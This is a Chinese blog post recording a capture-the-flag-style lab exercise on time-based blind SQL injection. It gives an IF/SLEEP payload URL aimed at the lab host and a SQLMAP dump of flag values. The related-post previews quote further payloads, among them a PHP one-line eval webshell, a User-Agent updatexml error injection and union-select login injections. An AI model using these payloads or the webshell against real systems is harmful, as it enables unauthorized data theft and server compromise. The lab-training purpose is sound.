[zkaq靶场]SQL注入--时间盲注

最新推荐文章于 2023-07-12 18:39:44 发布
最新推荐文章于 2023-07-12 18:39:44 发布
阅读量189 收藏
点赞数 1
分类专栏: zkaq靶场 文章标签: sql sql注入 数据库注入 渗透测试 sqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116544709
版权
本文回顾了SQL注入攻击,特别是时间盲注技术。通过使用IF和SLEEP函数,可以判断数据库长度和名称,例如在`database()`函数中进行长度判断导致延迟。通过SQLMAP工具,成功获取了数据库kanwolongxia中的表loflag及其数据。文章还提到了不同的闭合方式对注入的影响,例如使用单引号加括号。
摘要由CSDN通过智能技术生成

时间盲注

SQL注入回顾:网络安全笔记-99-渗透-SQL注入

使用if函数,和sleep函数进行判断

延时注入一

  • 判断数据库长度

查看可知延时五秒作用,说明语句执行成功。
然后再判断数据库名称,方法类似。

结果使用SQLMAP测试出来,获得flag。
Database: kanwolongxia
Table: loflag
[5 entries]
±-----±---------------+
| Id | flaglo |
±-----±---------------+
| 1 | zKaQ-QQQ |
| 2 | zKaQ-RD |
| 3 | zKaQ-Moren |
| 4 | zKaQ-time-hj |
| 5 | zKaQ-time-zxxz |
±-----±---------------+

延时注入二

闭合方式为单引号加括号,利用方法相同。

延时注入二

闭合方式为单引号加括号,利用方法相同。

  • http://inject2.lab.aqlab.cn:81/Pass-14/index.php?id=1’) and if(length(database())=12,sleep(5),1)–+
wwxxee
关注
专栏目录
[zkaq靶场]SQL注入--布尔盲注
wwxxee
05-08 197
布尔盲注 常用函数 length() 返回字符串长度 substring() substr() mid() 截取字符串: 参数1:字符串 参数2:起始位置,索引从1开始 参数3:截取长度 concat() 不带分隔符链接字符串 concat_ws() 带分隔符链接字符串: concat_ws(’-’,‘a’,‘b’,‘c’) group_concat() 链接一组查询结果字符串 ord() ascii() 返回字符串的ASCII值 left() 从左边开始截取字符串: 参数1:字符串 参数2:截取的长度 l
[zkaq靶场]SQL注入--DNS-LOG注入
wwxxee
05-08 251
DNS注入 介绍 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接
SQL注入(盲注)---zkaq
weixin_38237216的博客
04-06 1736
1.概念 盲注:有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注盲注种类: 布尔盲注:根据注入信息返回Ture或者flase,无之前类似的报错信息 时间盲注:无论输入任何值,返回信息都会按照正常情况处理,加入特定的时间函数,通过web页面的返回时间差来判断注入的语句是否正确 常用的函数: length():返回字符串的长度 substr():截取字符串 ord()/ascii():返回字符串的ascii码 2.靶场 1)测试是否存在
SQL注入----盲注
weixin_45922278的博客
10-17 158
盲注 注入攻击的本质,是把用户输入的数据当做代码执行. 1.是用户能够控制输入 2.是原本程序要执行的代码,拼接了用户输入的数据. 盲注 布尔盲注 : order by ,没有显示注入点 对错只显示有无数据 延时盲注 :页面无论怎么搞都不变 盲注需要掌握的几个函数 length() 返回字符串的长度 substr(...
变量覆盖 --- zkaq
weixin_38237216的博客
04-27 1939
1.概念 1.变量覆盖:变量覆盖指的是可以用我们的传参值替换程序原有的变量值 2.常见的变量覆盖的危险函数 extract()函数:将数组中变成变量 举例:<?php $a = “1”; $my_array = array(“a” => “Cat”,“b” => “Dog”, “c” => “Horse”); extract($my_array); echo “$a = $a; $b = $b; $c = $c”; ?> 运行结果:$a = Cat; $b = Dog; $
文件上传---zkaq
weixin_38237216的博客
04-02 257
一.文件上传概念 黑名单绕过 1.后缀检测(最常见的检测方式)----根据后缀来决定用什么东西来处理这个文件 2.Content-type .php =>phtml php3 php4 php5 .htaccess => 分布式配置文件 Windows 文件与文件夹都不区分大小写 .php .Php Windows 会自动去除后缀末尾的空格 .php .php空格 windows会自动去除后缀末尾的. .php .php…… Windows文件流绕过(NTFS格式)123.txt:a.txt
越权漏洞---zkaq
weixin_38237216的博客
04-13 265
1.概念 1.越权漏洞 横向越权(平行越权):相同权限下不同的用户可以互相访问 纵向越权(垂直越权):使用权限低的用户可以访问到权限较高的用户 2.越权类型 GET传参越权(例:http://cn-sec.com/archives/2572.html) POST传参越权(例:http://cn-sec.com/archives/1682.html) Cookie传参越权(例:http://cn-sec.com/archives/6421.html) 3.未授权访问漏洞 概念:只要有正确的网址就可以直
sql注入时间盲注
笔墨稠思
11-13 2766
什么是盲注? 所谓盲注,就是在服务器没有错误回显的时候完成注入攻击 什么是延时盲注? 通过web页面返回数据的时间差来判断注入语句是否正确 实现布尔盲注需要利用一下几个函数 length() 返回字符串长度 substr() 截取字符串 ascii() 返回字符的ascii码 sleep() 将程序挂起一段时间 if(exp1,exp2,exp3) 判断语句,第一个语句正确就执行第二个,否则执行第三个 靶场实战 首先判断是否存在注入
SQL盲注篇之布尔盲注
weixin_47785246的博客
07-11 3036
简单介绍SQL注入中的盲注,通过靶场的练习,演示SQL盲注的一些常用方法与思路。
sql注入之布尔盲注
笔墨稠思
11-13 173
什么是盲注? 所谓盲注,就是在服务器没有错误回显的时候完成注入攻击 什么是布尔盲注? 布尔,这个词很明显,他会根据我们输入的注入信息,返回True和False,没有其他的任何报错信息 实现布尔盲注需要利用一下几个函数 length() 返回字符串长度 substr() 截取字符串 ascii() 返回字符的ascii码 靶场实战: 我们发现这个靶场为get传参,参数为id = 1 首先我们判断是否存在注入 我们把传参改为id = 2 - 1 发现数据返
POST注入--万能密码(zkaq
最新发布
weixin_74410605的博客
07-12 1150
入门简单的sql注入中的post注入,一键学会万能密码
SQL注入--显错注入zkaq
weixin_74410605的博客
07-11 849
sql注入是一种数据库攻击攻击手段,就是用户在表单填写sql语句来使数据库执行该语句,在管理员不知情的情况下任意查询数据库中的信息,从而获得自身需要的信息,所以sql注入攻击的本质就是将用户输入的数据当作代码执行。
文件包含漏洞 --- zkaq
weixin_38237216的博客
04-23 2245
1.概念 1.文件包含:利用开发语言的内置文件包含函数,在一个代码文件中引入了另外一个代码文件 一句话概括:文件包含并不属于漏洞,但是,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。 文件包含核心就是**”引用”**。 2.php常用的文件包含函数 include():文件包含,代码用到才去读取使用 require():文件包含,在代码执行前就去读取包含的文件一起执行 include_once():同一个文件只包含一次 require_once():同一个文件只包含一次 区别:include遇到
内网渗透靶场(上)加入目标网段,抓取管理员密码 #zkaq
anlalu233的博客
09-17 1406
1、探测是否有sql注入: (1)从ur看, 传递了id=1这个参数;这里有可能涉及到和数据库交互,为了确认是否存在sql注入,这里故意构造and 1=2这个false的条件,看看页面返回啥: (2)果然页面报错,说明存在sql注入,并且还有个关键信息:当前页面在C:\phpStudy\WWW\这个目录下; (3)通过order by看看当前表有多少字段:order by 2是正常的,order by 3就异常了,说明有2个字段; (4)接着看看页面有没有报错点,方便后续观察结果...
[zkaq靶场]SQL注入--access数据库-偏移注入
wwxxee
05-09 422
Access注入–偏移注入 适用场景: 当使用select * from admin与select admin.* from admin等价时,就可以在不知道字段名的情况下获取数据。 union select 1,2,3,admin.* ,4,5,6 from admin 通过偏移admin.*的位置来获得不同字段的数据,这时就不需要知道字段名了。 靶场 该处的sql注入为access数据库-cookie注入的漏洞点。 偏移注入的漏洞点在: 由于admin表里新增了一个字段,无法通过爆破得出,所以在此处
[zkaq靶场]SQL注入--Header注入
wwxxee
05-08 263
SQL注入–Header注入 Header注入一 登录成功后,浏览器会存储一些信息. 此处经过判断为User-Agent字段. 抓包如下: 使用报错注入:由于updatexml的第二个参数需要xpath 格式的字符串,concat函数用~符号开头不是xml的语法,所以就会将括号内的执行结果以错误的形式报出,这样就实现了报错注入。 对User-Agent字段进行注入. User-Agent: 1' or updatexml(1,(concat(0x7e,(select database()))),1) a
[zkaq靶场]SQL注入--POST注入
wwxxee
05-08 473
SQL注入–POST注入 POST注入 POST型注入与GET型注入没有本质区别 POST注入一 输入账号密码,然后抓包 检测出单引号闭合的方式,接下来就可以进行注入. 检测出字段数 username=admin’ order by 3–+&password=1&submit=%E7%99%BB%E5%BD%95 检测回显点 ![] 爆库 username=admin1’ union select 1,2,database()–+&password=1&su
[zkaq靶场]文件上传
wwxxee
05-09 298
文件上传靶场 准备工作 一个php一句话木马:oneword.php <?php @eval($_REQUEST[6]);?> 一个图片马 copy cat.jpg/b + oneword.php new_cat.jpg 正常图片:cat.jpg 图片马:new_cat.jpg 第一关 前端验证绕过,形同虚设,通过抓包修改即可。 上传oneword.jpg,通过bp抓包修改为oneword.php 将filename修改为oneword.php,即可成功上传。 复制图片地址,打开菜刀。
zkaq宽字节注入 pass15-17
Demerol的博客
10-03 319
魔术引号 魔术引号会转移传参的内容 php防御函数magic_quotes_gpc(魔术引号开关) 当PHP的传参中有特殊字符(’ " \)就会再前面加转义字符’\’,来做一定的过滤。单引号和双引号内的一切都是字符串,那我们输入的东西如果不能闭合掉单引号和双引号,我们的输入就不会当作代码执行,就无法产生SQL注入 魔术引号PHP5.4以上就被取消的,取而代之的时addslashes()函数 遇到魔术引号时: 1:找一个不需要闭合的地方 2:宽字节注入 假设 = %5c 那么 %df\ =%df%5c=
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值